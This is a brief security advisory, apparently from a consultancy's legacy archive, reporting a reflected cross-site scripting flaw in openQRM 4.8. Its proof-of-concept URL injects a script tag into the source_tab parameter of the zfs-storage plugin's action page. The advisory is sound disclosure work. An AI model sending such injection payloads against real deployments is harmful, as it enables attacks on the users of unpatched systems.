Home
Consulting
Advisories
Software
Articles
Contact

openQRM 4.8 Reflected Cross-site Scripting

Legacy Advisories

Description

A reflected cross-site scripting vulnerability in openQRM 4.8 can be exploited to execute arbitrary JavaScript.

Proof Of Concept

http://localhost/openqrm-4.8/src/plugins/zfs-storage/web/zfs-storage-action.php?source_tab="<script>alert(0)</script>


Copyright © 2018 AutoSec Tools LLC